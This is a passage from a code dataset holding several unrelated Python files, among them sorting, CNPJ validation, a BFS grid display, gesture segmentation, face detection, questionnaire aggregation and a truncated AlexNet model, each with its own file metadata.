frameNumd + 1\n 
fileName = './newData/Depth/Depthclap/Sub7/7clap{:d}.jpg'.format(frameNumd)\n cv2.imwrite(filename=fileName,img=thresh1)\n image = Image.open(fileName)\n x,y = image.size\n new_dimensions = (x/6, y/6)\n output = image.resize(new_dimensions, Image.ANTIALIAS)\n output.save(fileName, \"JPEG\", quality = 95)\n m = m+1\n #cv2.waitKey(3000)\n \n \n #return (3,frameNumd, frameNumr)\n\n\nif __name__ == \"__main__\":\n global framesd, framesr\n matrix=[0,0,0,0]\n value=2\n i=0\n flag = 0\n setq = 1\n #while(True):\n get_depth(flag)\n print(\"data acquired\")\n jobs = [1, 11]\n num = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]\n fd1 = framesd[0:5]\n fd2 = framesd[5:10]\n fd3 = framesd[10:15]\n fd4 = framesd[15:20]\n fr1 = framesr[0:5]\n fr2 = framesr[5:10]\n fr3 = framesr[10:15]\n fr4 = framesr[15:20]\n p = Pool(4)\n p.map(masking, (i for i in [1, 2, 3, 4]) )\n\n \n \n","sub_path":"newkinect.py","file_name":"newkinect.py","file_ext":"py","file_size_in_byte":4402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"191176531","text":"def sel_sort(a):\n n = len(a)\n\n for i in range(0, n - 1):\n\n min_idx = i\n\n for j in range(i + 1, n):\n\n if a[j] < a[min_idx]:\n min_idx = j\n\n a[i], a[min_idx] = a[min_idx], a[i]\n\n print(a)\n\ndef selection_sort(a):\n n = len(a)\n for i in range(0, n-1):\n idx = i\n for j in range(i+1, n):\n if a[j] < a[idx]:\n idx = j\n a[i], a[idx] = a[idx], a[i]\n print(a)\n\nd = [7, 4, 2, 11, 50]\nselection_sort(d)\n","sub_path":"D1112/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"270815773","text":"import re\r\nentrada = str(input())\r\nlista = []\r\nlista.append(entrada)\r\n\r\ndef calculocnpj(v):\r\n formatado = \"\"\r\n final = v[16:18]\r\n container = []\r\n container2 = []\r\n print(final)\r\n for i in range (0,16):\r\n if(v[i] != '.' and v[i] != '/' and v[i] != '-'):\r\n container.append(int(v[i])) \r\n \r\n for i in range (0,17):\r\n if(v[i] != '.' 
and v[i] != '/' and v[i] != '-'):\r\n container2.append(int(v[i])) \r\n\r\n \r\n numero1 = [5, 4, 3, 2, 9, 8, 7, 6, 5, 4, 3, 2]\r\n soma1 = 0\r\n\r\n for i in range (0,12):\r\n aux1 = container[i]*numero1[i]\r\n soma1 = soma1 + aux1\r\n \r\n div1 = (soma1 % 11)\r\n \r\n if(div1 < 2):\r\n digito1 = 0\r\n else:\r\n digito1 = (11-div1) \r\n \r\n numero2 = [6, 5, 4, 3, 2, 9, 8, 7, 6, 5, 4, 3, 2]\r\n soma2 = 0\r\n \r\n for i in range (0,13):\r\n aux2 = container2[i]*numero2[i]\r\n soma2 = soma2 + aux2\r\n \r\n div2 = (soma2 % 11)\r\n \r\n if(div2 < 2):\r\n digito2 = 0\r\n else:\r\n digito2 = (11-div2)\r\n \r\n formatado = str(digito1) + str(digito2)\r\n print(formatado)\r\n if(formatado == final):\r\n return True\r\n else:\r\n return False\r\n\r\ndef formatocnpj (e):\r\n if(re.match(r'([0-9]{2}[\\.][0-9]{3}[\\.][0-9]{3}[/][0-9]{4}[-][0-9]{2}$)', e)):\r\n if(calculocnpj(e)):\r\n return True\r\n else:\r\n return False\r\n else:\r\n return False\r\n \r\nif((formatocnpj(lista[0]) == True)):\r\n print(True)\r\nelif((formatocnpj(lista[0]) == False)):\r\n print(False)","sub_path":"pp1/5.2.cnpj.py","file_name":"5.2.cnpj.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"360649467","text":"from datetime import datetime, timedelta\nimport pytz\n\nsave_path = ''\ntz = pytz.timezone('')\ntoday = datetime.now(tz).date()\ntoday_str = today.strftime('%Y-%m-%d')\nyesterday_str = today - timedelta(days=1)\nyesterday_str = yesterday_str.strftime('%Y-%m-%d')\n\n\"\"\"\nDeansList variables\n\"\"\"\nbase_url = ''\napi_keys = [\n '',\n ]\n\nendpoints = [\n ## FLAT JSON - PARAMETERS ##\n {'endpoint':'/api/beta/export/get-behavior-data.php',\n 'name':'behavior',\n 'params':{'sdt':'2016-07-01', 'edt':yesterday_str, 'UpdatedSince':yesterday_str, 'IncludeDeleted':'Y'}},\n ## FLAT JSON - NO PARAMETERS ##\n {'endpoint':'/api/v1/referrals', 'name':'referrals'},\n {'endpoint':'/api/beta/export/get-comm-data.php', 'name':'communication'},\n {'endpoint':'/api/v1/followups', 'name':'followups'},\n {'endpoint':'/api/beta/export/get-roster-assignments.php', 'name':'roster_assignments'},\n {'endpoint':'/api/v1/lists', 'name':'lists'},\n {'endpoint':'/api/v1/rosters', 'name':'rosters_all'},\n {'endpoint':'/api/beta/export/get-users.php', 'name':'users'},\n ## CONTAIN NESTED JSON ##\n {'endpoint':'/api/v1/incidents', 'name':'incidents'},\n # ## UNUSED ##\n # {'endpoint':'/api/beta/export/get-homework-data.php', 'name':'homework', 'array_cols':[]},\n # {'endpoint':'/api/v1/suspensions', 'name':'suspensions', 'nested':1, 'array_cols':[]},\n # {'endpoint':'/api/v1/students', 'name':'students', 'nested':0},\n # {'endpoint':'/api/v1/daily-attendance', 'name':'daily_attendance', 'nested':0},\n # {'endpoint':'/api/v1/class-attendance', 'name':'class_attendance', 'nested':0},\n # {'endpoint':'/api/v1/terms', 'name':'terms', 'nested':1},\n # {'endpoint':'/api/beta/bank/get-bank-book.php', 'name':'points_bank', 'nested':1},\n # {'endpoint':'/api/v1/lists/{ListID}', 'name':'list_sessions_all', 'nested':1},\n # {'endpoint':'/api/v1/lists/{ListID}/{SessionID}', 'name':'list_sessions_id', 'nested':1},\n # {'endpoint':'/api/v1/lists/{ListID}/{SessionDate}', 'name':'list_sessions_date', 'nested':1},\n # {'endpoint':'/api/v1/rosters/(RosterID)', 'name':'rosters_single', 'nested':1},\n ]\n\n\"\"\"\nall together now!\n\"\"\"\nCONFIG = {\n 'base_url': base_url,\n 'api_keys': api_keys,\n 'endpoints': endpoints,\n 'save_path': save_path\n 
}\n","sub_path":"deanslist_config.py","file_name":"deanslist_config.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"303938057","text":"# Robot Programming\n# breadth first search\n# by Dr. Qin Chen\n# May, 2016\n\nimport sys\nimport Tkinter as tk\nfrom starter_grid_graph import GridGraph\nfrom starter_bfs import BFS\n\n##############\n# This class supports display of a grid graph. The node location on canvas\n# is included as a data field of the graph, graph.node_display_locations.\n##############\n\nclass GridGraphDisplay(object):\n def __init__(self, frame, graph):\n self.node_dist = 60\n self.node_size = 40\n self.gui_root = frame\n self.canvas = None\n self.graph = graph\n self.nodes_location = graph.node_display_locations\n self.start_node = graph.startNode\n self.goal_node = graph.goalNode\n self.logger_text = None\n\n self.setup_gui()\n return\n\n def setup_gui(self):\n self.gui_root.geometry('400x400')\n self.canvas = tk.Canvas(self.gui_root, width=400, height=400, bg='white')\n self.canvas.pack(expand=1, fill='both')\n return\n\n def set_log_text(self, new_text):\n if self.logger_text:\n self.canvas.itemconfig(self.logger_text, text=new_text)\n\n # draws nodes and edges in a graph\n def display_graph(self):\n self.canvas.delete(\"all\")\n self.logger_text = self.canvas.create_text(380, 20, text='No logging yet...', anchor=tk.NE, justify=tk.RIGHT, state=tk.DISABLED)\n\n for node_name in self.graph.nodes:\n for conn in self.graph.nodes[node_name]:\n self.draw_edge(self.get_node_location(node_name), self.get_node_location(conn), 'black')\n self.draw_node(self.get_node_location(node_name), 'red')\n\n # path is a list of nodes ordered from start to goal node\n def highlight_path(self, path):\n for node_name in path:\n node = self.get_node_location(node_name)\n self.draw_node(node, 'green')\n\n def get_node_location(self, name):\n for node_loc in self.nodes_location:\n if node_loc[0] == name:\n return node_loc[0], node_loc[1] * self.node_dist, node_loc[2] * self.node_dist\n\n return 'None', 0, 0\n\n # draws a node in given color. The node location info is in passed-in node object\n def draw_node(self, node_e, n_color):\n self.canvas.create_oval(node_e[1], node_e[2], node_e[1] + self.node_size, node_e[2] + self.node_size, fill=n_color)\n self.canvas.create_text(node_e[1] + (self.node_size / 2), node_e[2] + (self.node_size / 2), text=node_e[0])\n\n # draws an line segment, between two given nodes, in given color\n def draw_edge(self, node1_e, node2_e, e_color):\n self.canvas.create_line(node1_e[1] + (self.node_size / 2), node1_e[2] + (self.node_size / 2), node2_e[1] + (self.node_size / 2), node2_e[2] + (self.node_size / 2), fill=e_color)\n\ndef main():\n frame = tk.Tk()\n graph = GridGraph()\n\n # grid dimension\n graph.set_grid_rows(4)\n graph.set_grid_cols(3)\n\n # origin of grid is (0, 0) lower left corner\n # graph.obs_list = ([1,1],) # in case of one obs. 
COMMA\n graph.obs_list = ([3, 0], [2, 2])\n\n graph.set_start('0-0')\n graph.set_goal('2-1')\n\n graph.make_grid()\n graph.connect_nodes()\n graph.compute_node_locations()\n\n bfs = BFS(graph.nodes)\n shortest = bfs.bfs_shortest_path('0-0', '3-2')\n\n print(shortest)\n\n program = GridGraphDisplay(frame, graph)\n program.display_graph()\n\n program.highlight_path(shortest[0])\n\n program.gui_root.mainloop()\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"HamsterLabGrid/starter_grid_graph_display.py","file_name":"starter_grid_graph_display.py","file_ext":"py","file_size_in_byte":3507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"35493233","text":"\"\"\"Primitives for operating on job publishers of type 'Flexible Publisher'\"\"\"\nfrom pyjen.utils.xml_plugin import XMLPlugin\n\n\nclass FlexiblePublisher(XMLPlugin):\n \"\"\"Job plugin enabling conditional execution of post-build steps\n\n https://wiki.jenkins-ci.org/display/JENKINS/Flexible+Publish+Plugin\n \"\"\"\n\n @property\n def actions(self):\n \"\"\"list of publishers associated with this instance\n\n :returns: list of publishers associated with this instance\n :rtype: :class:`list` of :class:`ConditionalPublisher`\n \"\"\"\n nodes = self._root.find(\"publishers\")\n\n retval = []\n for node in nodes:\n plugin = create_xml_plugin(node)\n if plugin is not None:\n retval.append(plugin)\n else:\n self._log.warning(\"Flexible publisher plugin %s not found\",\n get_plugin_name(node))\n\n return retval\n\n @staticmethod\n def get_jenkins_plugin_name():\n \"\"\"Gets the name of the Jenkins plugin associated with this PyJen plugin\n\n This static method is used by the PyJen plugin API to associate this\n class with a specific Jenkins plugin, as it is encoded in the config.xml\n\n :rtype: :class:`str`\n \"\"\"\n return \"flexiblepublish\"\n\n\nclass ConditionalPublisher(XMLPlugin):\n \"\"\"a single 'conditional' publisher contained within the flexible publisher\n \"\"\"\n\n @property\n def publisher(self):\n \"\"\"action to be performed when the conditions of this publisher are met\n\n :returns:\n list of PyJen objects which control each conditional action to be\n performed. Return None if an publisher plugin not currently\n supported by PyJen is being used\n :rtype: :class:`list` of PyJen objects,\n\n \"\"\"\n node = self._root.find(\"publisher\")\n plugin = create_xml_plugin(node)\n\n if plugin is None:\n self._log.warning(\"Publisher plugin %s referenced by Flexible \"\n \"Publisher not found\", get_plugin_name(node))\n\n return plugin\n\n\nPluginClass = FlexiblePublisher\n\n\nif __name__ == \"__main__\": # pragma: no cover\n pass\n","sub_path":"src/pyjen/plugins/flexiblepublish.py","file_name":"flexiblepublish.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"543670833","text":"\"\"\"\nBasic framework to segment and recognize gestures. 
Intended to work with:\nADXL335GestureRecorder.ino, which can be found here: https://bit.ly/2HUk9oj \n(it's in our CSE599 github in \"Assignments/A3-OfflineGestureRecognizer/GestureRecorder/Arduino/ADXL335GestureRecorder\")\n\n\nBy Jon Froehlich\nhttp://makeabilitylab.io\n\nVisualization code based on:\n- https://electronut.in/plotting-real-time-data-from-arduino-using-python/ by Mahesh Venkitachalam\n- https://www.thepoorengineer.com/en/arduino-python-plot/ \n\n\n\"\"\"\n\nimport sys, serial, argparse\nimport numpy as np\nfrom time import sleep\nfrom collections import deque\nimport itertools\nimport math\nfrom matplotlib.gridspec import GridSpec\n\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n\n# plot class\nclass AccelPlot:\n\n ARDUINO_CSV_INDEX_TIMESTAMP = 0\n ARDUINO_CSV_INDEX_X = 1\n ARDUINO_CSV_INDEX_Y = 2\n ARDUINO_CSV_INDEX_Z = 3\n\n # constr\n def __init__(self, fig, ax, str_port, baud_rate=9600, max_length=100):\n # open serial port\n self.ser = serial.Serial(str_port, 9600)\n\n self.fig = fig\n self.ax = ax\n\n self.data = list()\n num_values_to_plot = 4\n for i in range(0, num_values_to_plot):\n buf = deque()\n self.data.append(buf)\n\n self.x = self.data[0]\n self.y = self.data[1]\n self.z = self.data[2]\n self.mag = self.data[3] \n self.time = deque()\n\n self.max_length = max_length # max length to show\n\n # segmentation stuff\n self.window_length = 30\n self.window_step = 10\n self.window_buffer = deque()\n self.current_event = None #tuple (time list, mag list, x list, y list, z list)\n\n def __add_to_buffer(self, buf, val):\n if len(buf) < self.max_length:\n buf.append(val)\n else:\n buf.popleft()\n buf.append(val)\n\n\n def add_data(self, csv_data):\n self.__add_to_buffer(self.time, csv_data[AccelPlot.ARDUINO_CSV_INDEX_TIMESTAMP])\n self.__add_to_buffer(self.x, csv_data[AccelPlot.ARDUINO_CSV_INDEX_X])\n self.__add_to_buffer(self.y, csv_data[AccelPlot.ARDUINO_CSV_INDEX_Y])\n self.__add_to_buffer(self.z, csv_data[AccelPlot.ARDUINO_CSV_INDEX_Z])\n xval = csv_data[AccelPlot.ARDUINO_CSV_INDEX_X]\n yval = csv_data[AccelPlot.ARDUINO_CSV_INDEX_Y]\n zval = csv_data[AccelPlot.ARDUINO_CSV_INDEX_Z]\n mag = math.sqrt(csv_data[AccelPlot.ARDUINO_CSV_INDEX_X] ** 2 + \n csv_data[AccelPlot.ARDUINO_CSV_INDEX_Y] ** 2 + \n csv_data[AccelPlot.ARDUINO_CSV_INDEX_Z]** 2) \n self.__add_to_buffer(self.mag, mag)\n\n # add mag to window buffer used for segmentation\n self.window_buffer.append(mag)\n\n\n def segment_event(self):\n segment_result = None\n if len(self.window_buffer) >= self.window_length:\n # you may need/want to change these tolerances\n min_max_begin_segment_threshold = 90 \n min_max_continue_segment_threshold = 25 #lower threshold for continuing event\n min_event_length_ms = 600\n\n # analyze the buffer\n s = np.array(self.window_buffer)\n min_max_diff = abs(np.max(s) - np.min(s))\n\n if min_max_diff > min_max_begin_segment_threshold and self.current_event is None:\n print(\"begin segment!\", min_max_diff)\n \n start_idx = len(self.time) - self.window_length\n end_idx = len(self.time)\n \n t = list(itertools.islice(self.time, start_idx, end_idx))\n s = list(itertools.islice(self.mag, start_idx, end_idx))\n x_seg = list(itertools.islice(self.x, start_idx, end_idx))\n y_seg = list(itertools.islice(self.y, start_idx, end_idx))\n z_seg = list(itertools.islice(self.z, start_idx, end_idx))\n\n self.ax.axvline(self.time[-self.window_length], ls='--', color='black', linewidth=1, alpha=0.8)\n self.current_event = (t, s)\n elif self.current_event is not 
None:\n # we are in the middle or end of a potential event\n if min_max_diff >= min_max_continue_segment_threshold: \n print(\"continue segment\", min_max_diff)\n \n start_idx = len(self.time) - self.window_step\n end_idx = len(self.time)\n \n t = list(itertools.islice(self.time, start_idx, end_idx))\n s = list(itertools.islice(self.mag, start_idx, end_idx))\n x_seg = list(itertools.islice(self.x, start_idx, end_idx))\n y_seg = list(itertools.islice(self.y, start_idx, end_idx))\n z_seg = list(itertools.islice(self.z, start_idx, end_idx))\n\n self.current_event[0].extend(t)\n self.current_event[1].extend(s)\n elif min_max_diff < min_max_continue_segment_threshold:\n print(\"finish segment\", min_max_diff)\n event_time = self.current_event[0]\n event_length_ms = event_time[-1] - event_time[0]\n if event_length_ms > min_event_length_ms:\n self.ax.axvspan(event_time[0], event_time[-1], color='red', alpha=0.4)\n self.ax.axvline(event_time[-1], ls='--', color='black', linewidth=1, alpha=0.8)\n else:\n print(\"discarded event for being too short\")\n\n segment_result = {'time' : self.current_event[0],\n 'signal' : self.current_event[1] }\n \n self.current_event = None # clear events\n\n new_length = self.window_length - self.window_step\n while len(self.window_buffer) > new_length:\n self.window_buffer.popleft()\n\n return segment_result\n\n #def show_subplots(self, segment_result, gestureToCompare, signalsDict):\n\n \n def classify_event(self, segment_result):\n # print(\"classify event\", segment_result)\n t = segment_result['time']\n s = segment_result['signal']\n\n # update plot\n def update(self, frameNum, args, plt_lines):\n try:\n while self.ser.in_waiting:\n line = self.ser.readline()\n line = line.decode('utf-8')\n data = line.split(\",\")\n data = [int(val.strip()) for val in line.split(\",\")]\n #print(data)\n self.add_data(data)\n\n segment_result = self.segment_event()\n if segment_result != None:\n cls_result = self.classify_event(segment_result)\n\n\n # plot the data\n for i in range(0, len(plt_lines)):\n plt_lines[i].set_data(self.time, self.data[i])\n self.ax.set_xlim(self.time[0], self.time[-1])\n\n except KeyboardInterrupt:\n print('exiting')\n\n # except Exception as e:\n # print('Error '+ str(e))\n\n #return a0,\n return plt_lines\n\n # clean up\n def close(self):\n # close serial\n self.ser.flush()\n self.ser.close()\n\n # main() function\n\n\ndef main():\n\t# python serial_plotter.py --port /dev/cu.usbmodem14601\n\t# windows: python lserial_plotter.py --port COM5\t\n # create parser\n\n parser = argparse.ArgumentParser(description=\"Accel Serial Plotter\")\n\n # add expected arguments\n parser.add_argument('--port', dest='port', required=True, help='the serial port for incoming data')\n parser.add_argument('--max_len', dest='max_len', required=False, default=770, type=int, \n help='the number of samples to plot at a time')\n\n # parse args\n args = parser.parse_args()\n\n # strPort = '/dev/tty.usbserial-A7006Yqh'\n str_port = str(args.port)\n\n print('Reading from serial port: {}'.format(str_port))\n\n # plot parameters\n\n fig = plt.figure(figsize=(10, 5), tight_layout=True)\n gs = GridSpec(2, 4, figure=fig)\n ax1 = fig.add_subplot(gs[0, :])\n ax2 = fig.add_subplot(gs[1, 0])\n ax2.set_ylabel(\"x_p\")\n ax2.set_xlabel(\"time\")\n #ax1.setTitle(\"real time gestures\")\n #ax2.setTitle(\"x_p comparison\")\n ax3=fig.add_subplot(gs[1, 1])\n ax3.set_ylabel(\"y_p\")\n ax3.set_xlabel(\"time\")\n ax4=fig.add_subplot(gs[1,2])\n ax4.set_ylabel(\"z_p\")\n ax4.set_xlabel(\"time\")\n 
ax5= fig.add_subplot(gs[1,3])\n ax5.set_ylabel(\"mag_p\")\n ax5.set_xlabel(\"time\")\n #ax3.setTitle(\"y_p comparison\")\n #ax4.setTitle(\"z_p comparison\")\n #ax5.setTitle(\"mag_p comparison\")\n #ax = plt.axes(xlim=(0, args.max_len), ylim=(0, 1023))\n fig.align_labels()\n ax1.set_ylim((0, 1500))\n ax2.set_ylim((0, 1500))\n ax3.set_ylim((0, 1500))\n ax4.set_ylim((0, 1500))\n ax5.set_ylim((0, 1500))\n #ax = plt.axes(ax1, ylim=(0, 1500))\n #plt.show()\n\n\n accel_plot = AccelPlot(fig, ax1, str_port, max_length=args.max_len)\n\n # set up animation\n \n lines = list()\n num_vals = 4 # x,y,z,mag\n labels = ['x', 'y', 'z', 'mag']\n alphas = [0.8, 0.8, 0.8, 0.9]\n for i in range(0, num_vals):\n line2d, = ax1.plot([1], [1], label=labels[i], alpha=alphas[i])\n lines.append(line2d)\n\n handles, labels = ax1.get_legend_handles_labels()\n ax1.legend(handles, labels)\n\n xpLines = list()\n num_vals_xp = 2\n labels_subplotsx = ['current gesture', 'aggregate gesture']\n labels_subplotsy = ['current gesture', 'aggregate gesture']\n labels_subplotsz = ['current gesture', 'aggregate gesture']\n labels_subplotsmag = ['current gesture', 'aggregate gesture']\n alphassub = [0.8, 0.8]\n ypLines = list()\n zpLines = list()\n magpLines = list()\n for i in range(0, num_vals_xp):\n line2dx = ax2.plot([1], [1], label=labels_subplotsx[i], alpha=alphassub[i])\n xpLines.append(line2dx)\n line2dy = ax3.plot([1], [1], label=labels_subplotsy[i], alpha=alphassub[i])\n ypLines.append(line2dy)\n line2dz = ax4.plot([1], [1], label=labels_subplotsz[i], alpha=alphassub[i])\n zpLines.append(line2dz)\n line2dmag = ax5.plot([1], [1], label=labels_subplotsmag[i], alpha=alphassub[i])\n magpLines.append(line2dmag)\n\n handles1, labels1 = ax3.get_legend_handles_labels()\n ax2.legend(handles1, labels1)\n handles2, labels2 = ax3.get_legend_handles_labels()\n ax3.legend(handles2, labels2)\n handles, labels = ax4.get_legend_handles_labels()\n ax4.legend(handles, labels)\n handles, labels = ax5.get_legend_handles_labels()\n ax5.legend(handles, labels)\n\n # for more on animation function, see https://jakevdp.github.io/blog/2012/08/18/matplotlib-animation-tutorial/\n anim = animation.FuncAnimation(fig, accel_plot.update,\n fargs=(args, lines), # could consider adding blit=True\n interval=50) #interval=50 is 20fps\n # show plot\n plt.show()\n\n # clean up\n accel_plot.close()\n\n print('Exiting...')\n\n\n# call main\nif __name__ == '__main__':\n main()","sub_path":"Our stuff/realtimegesturesegmentation/gesture_rec.py","file_name":"gesture_rec.py","file_ext":"py","file_size_in_byte":11120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"237912431","text":"import csv\n\nindegree = {}\nwith open('heapdump.csv', newline='') as csvfile:\n ptr_reader = csv.reader(csvfile, delimiter=',')\n for row in ptr_reader:\n indegree[row[0]] = 1\n\nwith open('heapdump.csv', newline='') as csvfile:\n ptr_reader = csv.reader(csvfile, delimiter=',')\n for row in ptr_reader:\n for i in range(len(row)):\n col = row[i]\n if i != 1 and i != 0 and col in indegree:\n indegree[col] += 1\n\n# write the pointers that are not linear and their ref_count\nwith open('ref_count.csv','w', newline='') as inp:\n ptr_writer = csv.writer(inp)\n for ptr in indegree:\n if indegree[ptr] > 1:\n ptr_writer.writerow([ptr, indegree[ptr]])\n\n# write blocks that are not linear\nwith open('heapdump.csv', newline='') as inp:\n ptr_reader = csv.reader(inp)\n with open('nonlinear_block.csv', 'w', newline='') as out:\n ptr_writer = 
csv.writer(out)\n for row in ptr_reader:\n col = row[0]\n if indegree[col] > 1:\n ptr_writer.writerow(row)\n\n# write \nwith open('heapdump.csv', newline='') as inp:\n ptr_reader = csv.reader(inp)\n with open('forward_block.csv', 'w', newline='') as out:\n ptr_writer = csv.writer(out)\n for row in ptr_reader:\n if row[1] == '250' or row[1] == '252':\n ptr_writer.writerow(row)\n","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"151697627","text":"\n\nimport numpy as np\n\nimport pandas as pd\n\nimport seaborn as sns\n\nimport math\n\nimport matplotlib\n\nimport matplotlib.pyplot as plt\n\nimport random\n\nimport statistics as st\n\nimport AntSimulation as ans\n\n#Parameter order \n#grid_size, num_cols, max_oc, ants_per_colony, alpha, beta, w, evap, pher_trail\n\n#parameter sweep result variables\n\nalpha = 1\nbeta = 1\ngrid_size = 20\nnum_colonies = 3\nmax_occ = 20\nants_per_col = 50\nw=.5\nevap = .9\npher_trail = 2\n\n\nparamlst = [ 20, 30, 40, 50 ] \nparamlstt = [ 2, 3, 4, 5, 6 ]\n\n\nresultslst = []\n\nfor m in paramlst:\n resultslstt = []\n for k in paramlstt:\n \n vals = []\n \n for pe in range(10):\n ModelObj = ans.init_model(m, k, max_occ, ants_per_col, alpha, beta, w, evap, pher_trail)\n delivery_total = 0\n for ex in range(50):\n delivery_total += ans.update_model(ModelObj)\n \n vals.append(delivery_total)\n\n \n score = sum(vals)/len(vals)\n resultslstt.append(score)\n\n resultslst.append(resultslstt)\n\n\nprint(resultslst)\n\nresarr = pd.DataFrame( resultslst)\n\nprint(resarr)\n\n\np1 = sns.heatmap(resarr, cmap=\"YlGnBu\", yticklabels=paramlst, xticklabels=paramlstt, annot=True, fmt=\".1f\")\np1.invert_yaxis()\nplt.xlabel('Number of colonies')\nplt.ylabel('Grid size')\nplt.title('Total deliveries heatmap by Grid size and number of colonies')\nplt.show()\n\n\n\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"398376954","text":"from pathlib import Path\nimport pandas as pd\nfrom warnings import warn\n\nroot_path = Path(\"/Volumes/lhab_public/03_Data/04_data_questionnaires/00_rawdata_tp6/04_complete\")\nout_path = Path(\"/Volumes/lhab_public/03_Data/04_data_questionnaires/00_rawdata_tp6/aggregated_data\")\nout_path.mkdir(exist_ok=True)\n\nfiles = sorted(root_path.glob(\"*quest*.xlsx\"))\ndf_out = pd.DataFrame()\n\n\ndef excel_letter_to_num(l):\n from string import ascii_lowercase\n letter_lut = {letter: index for index, letter in enumerate(ascii_lowercase, start=0)}\n return letter_lut[l.lower()]\n\n\ndef extract_data_via_mapping(file, lut, sheet=\"01_Veränderungsfragebogen\", row_offset=-2):\n df_out = pd.DataFrame()\n lut = lut.dropna(axis=\"index\", how=\"all\")\n\n df_in = pd.read_excel(file, sheet_name=sheet)\n for _, row in lut.iterrows():\n name, col_idx, row_idx = row[\"variable_short_engl\"], excel_letter_to_num(row[\"value_col\"]), \\\n int(row[\"value_row\"]) + row_offset\n df_out = df_out.append(pd.DataFrame({\"variable\": name, \"value\": df_in.iloc[row_idx, col_idx]}, index=[0]))\n df_out = df_out.set_index(\"variable\").T\n\n return df_out\n\n\nsheets = [\"02_Gesundheitszustand\", \"10_Soziale_Unterstützung\", \"12_Pittsburgh_Sleep_Inventory\"]\n\nfor sheet in sheets:\n print(sheet)\n lut_file = 
Path(f\"/Volumes/lhab_public/03_Data/04_data_questionnaires/00_rawdata_tp6/mapping/mapping_{sheet}.xlsx\")\n lut = pd.read_excel(lut_file)\n\n dfs = []\n for f in files:\n print(f)\n id = pd.read_excel(f, sheet_name=\"ID\", usecols=\"A:B\", names=[\"variable\", \"value\"], header=None)\n id.dropna(axis=\"index\", how=\"all\", inplace=True)\n id = id.set_index(\"variable\").T\n id[\"file\"] = f\n\n df1 = extract_data_via_mapping(f, lut, sheet=sheet)\n df = pd.concat((id, df1), axis=1)\n dfs.append(df)\n\n df_out = pd.concat(dfs, axis=0, sort=False)\n df_out.to_excel(out_path / f\"00_aggregated_{sheet}.xlsx\", index=False)\n","sub_path":"scripts/aggregate_tp6/aggregate_quest_health_social_psqi_tp6.py","file_name":"aggregate_quest_health_social_psqi_tp6.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"232111159","text":"import cv2\r\n\r\n#Creating a cascading classifier object\r\nface_cascade = cv2.CascadeClassifier(\"C:\\\\Users\\\\subha\\\\docs\\\\Desktop\\\\Coursera\\\\Python\\\\work_place\\\\haarcascade_frontalface_alt.xml\")\r\neye_cascade = cv2.CascadeClassifier(\"C:\\\\Users\\\\subha\\\\docs\\\\Desktop\\\\Coursera\\\\Python\\\\work_place\\\\haarcascade_eye.xml\")\r\n\r\n#Reading an image as it is\r\nimg = cv2.imread(\"C:\\\\Users\\\\subha\\\\Pictures\\\\basant\\\\face_detect.jpg\")\r\n\r\n#Converting it to gray scale image\r\ngray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\n#Finding coordinates of faces in image\r\nfaces = face_cascade.detectMultiScale(gray_img, scaleFactor=1.05, minNeighbors=5)\r\n\r\nprint(type(faces))\r\nprint(faces)\r\n\r\nfor x, y, w, h in faces:\r\n img = cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 3)\r\n\r\nresized = cv2.resize(img, (800,800))\r\ncv2.imshow(\"Gray\",resized)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","sub_path":"facedetection.py","file_name":"facedetection.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"118116021","text":"# -*- coding: utf-8 -*-\nfrom django import template\nfrom django.core import urlresolvers\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef get_edit_admin_page(profile_id):\n url_to_admin_edit_page = urlresolvers.reverse('admin:main_profile_change', args=(profile_id,))\n return url_to_admin_edit_page\n","sub_path":"main/templatetags/main_tags.py","file_name":"main_tags.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"116503477","text":"import torch.nn as nn\nimport torch\n\n\nclass AlexNet(nn.Module):\n def __init__(self, num_classes=1000, init_weights=False):\n super(AlexNet, self).__init__()\n # 卷积层的定义,具体的输入输出特征尺寸计算公式可以自行学习其他资料,利用好网络这把双刃剑\n '''\n nn.Conv2d(padding=2)其中的padding接收的参数可以是整型也可以是元组\n 如果是整形,那么相当于再图片的四周补上padding行0\n 如果是元组(a,b):\n 在图片的上下填充a行0\n 在图片的左右填充b列0\n '''\n self.features = nn.Sequential(\n nn.Conv2d(3, 96, kernel_size=11, stride=4, padding=2), # input[3, 224, 224] output[96, 55, 55]\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2), # output[96, 27, 27]\n nn.Conv2d(96, 256, kernel_size=5, stride=1,padding=2), # output[256, 27, 27]\n nn.ReLU(inplace=True),\n 